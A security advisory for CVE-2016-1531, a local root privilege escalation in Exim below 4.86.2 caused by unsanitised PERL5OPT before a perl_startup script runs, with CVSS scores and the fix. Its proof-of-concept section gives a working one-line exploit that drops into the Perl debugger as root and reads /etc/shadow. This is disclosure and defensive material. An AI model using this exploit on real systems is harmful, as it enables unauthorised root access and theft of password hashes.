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Exim 4.86.2 - Local Privilege Escalation

2016-03-1000:00:00
Dawid Golunski
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7 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

HIGH

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

Exim 4.86.2 - Local Privilege Escalation

=============================================
- Advisory release date: 10.03.2016
- Created by: Dawid Golunski
- Severity: High/Critical
=============================================


I. VULNERABILITY
-------------------------

Exim < 4.86.2        Local Root Privilege Escalation Exploit


II. BACKGROUND
-------------------------

"Exim is a message transfer agent (MTA) developed at the University of 
Cambridge for use on Unix systems connected to the Internet. It is freely 
available under the terms of the GNU General Public Licence. In style it is 
similar to Smail 3, but its facilities are more general. There is a great 
deal of flexibility in the way mail can be routed, and there are extensive 
facilities for checking incoming mail. Exim can be installed in place of 
Sendmail, although the configuration of Exim is quite different."

http://www.exim.org/


III. INTRODUCTION
-------------------------

When Exim installation has been compiled with Perl support and contains a 
perl_startup configuration variable it can be exploited by malicious local 
attackers to gain root privileges.

IV. DESCRIPTION
-------------------------

The vulnerability stems from Exim in versions below 4.86.2 not performing 
sanitization of the environment before loading a perl script defined
with perl_startup setting in exim config.

perl_startup is usually used to load various helper scripts such as
mail filters, gray listing scripts, mail virus scanners etc.

For the option to be supported, exim must have been compiled with Perl 
support, which can be verified with:

[dawid@centos7 ~]$ exim -bV -v | grep i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL
Content_Scanning DKIM Old_Demime PRDR OCSP


To perform the attack, attacker can take advantage of the exim's sendmail 
interface which links to an exim binary that has an SUID bit set on it by 
default as we can see below:

[dawid@centos7 ~]$ ls -l /usr/sbin/sendmail.exim 
lrwxrwxrwx. 1 root root 4 Nov 30 00:45 /usr/sbin/sendmail.exim -> exim

[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec  7  2015 /usr/sbin/exim


Normally, when exim sendmail interface starts up, it drops its root
privileges before giving control to the user (i.e entering mail contents for
sending etc), however an attacker can make use of the following command line 
parameter which is available to all users:

-ps    This  option  applies when an embedded Perl interpreter is linked with 
       Exim. It overrides the setting of the perl_at_start option, forcing the 
       starting of the interpreter to occur as soon as Exim is started.


As we can see from the documentation at:

http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html

the perl_at_start option does the following:

"Setting perl_at_start (a boolean option) in the configuration requests a 
startup when Exim is entered."

Therefore it is possible to force the execution of the perl_startup script
defined in the Exim's main config before exim drops its root privileges.


To exploit this setting and gain the effective root privilege of the SUID binary,
attackers can inject PERL5OPT perl environment variable, which does not get
cleaned by affected versions of Exim.

As per perl documentation, the environment variable allows to set perl command-line 
options (switches). Switches in this variable are treated as if they were on every
Perl command line. 

There are several interesting perl switches that that could be set by attackers to 
trigger code execution. 
One of these is -d switch which forces perl to enter an interactive debug mode 
in which it is possible to take control of the perl application.

An example proof of concept exploit using the -d switch can be found below.


V. PROOF OF CONCEPT ROOT EXPLOIT
-------------------------

[dawid@centos7 ~]$ head /etc/exim/exim.conf 
######################################################################
#                  Runtime configuration file for Exim               #
######################################################################

# Custom filtering via perl
perl_startup = do '/usr/share/exim4/exigrey.pl'

[dawid@centos7 ~]$ exim -bV -v | grep -i Perl
Support for: crypteq iconv() IPv6 PAM Perl Expand_dlfunc TCPwrappers OpenSSL Content_Scanning DKIM Old_Demime PRDR OCSP

[dawid@centos7 ~]$ PERL5OPT="-d/dev/null" /usr/sbin/sendmail.exim -ps victim@localhost

Loading DB routines from perl5db.pl version 1.37
Editor support available.

Enter h or 'h h' for help, or 'man perldebug' for more help.

Debugged program terminated.  Use q to quit or R to restart,
  use o inhibit_exit to avoid stopping after program termination,
  h q, h R or h o to get additional info.  

  DB<1> p system("id");
uid=0(root) gid=10(wheel) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
0
  DB<2> p system("head /etc/shadow");
root:$5$afgjO3wQeqHpAYF7$TmL0[...]AYAAvbA:16682:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7::
[...]


VI. BUSINESS IMPACT
-------------------------

This vulnerability could be exploited by attackers who have local access to the
system to escalate their privileges to root which would allow them to fully
compromise the system.

VII. SYSTEMS AFFECTED
-------------------------

Exim versions before the latest patched version of Exim 4.86.2 are affected by 
this vulnerability, if Exim was compiled with Perl support and the main 
configuration file (i.e /etc/exim/exim.conf or /etc/exim4/exim.conf), contains 
a perl_startup option e.g:

perl_startup = do '/usr/share/exim4/exigrey.pl'

It is important to note that the file does not necessarily have to exist
to exploit the vulnerability. Although the path must be specified.


VIII. SOLUTION
-------------------------

Update to Exim 4.86.2 which contains the official patch that fixes the
environment sanitization issues.

IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/Exim-Local-Root-Privilege-Escalation.txt
http://www.exim.org/
http://www.exim.org/static/doc/CVE-2016-1531.txt
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
https://github.com/Exim/exim/commit/29f9808015576a9a1f391f4c6b80c7c606a4d99f

CVE-2016-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531

X. ADVISORY CREATED BY
-------------------------

This advisory has been created by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com

XI. REVISION HISTORY
-------------------------

March 10th, 2016:  Advisory released
March 11th, 2016:  Fixed advisory header,added cve.mitre link of the root issue

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

7 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

HIGH

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

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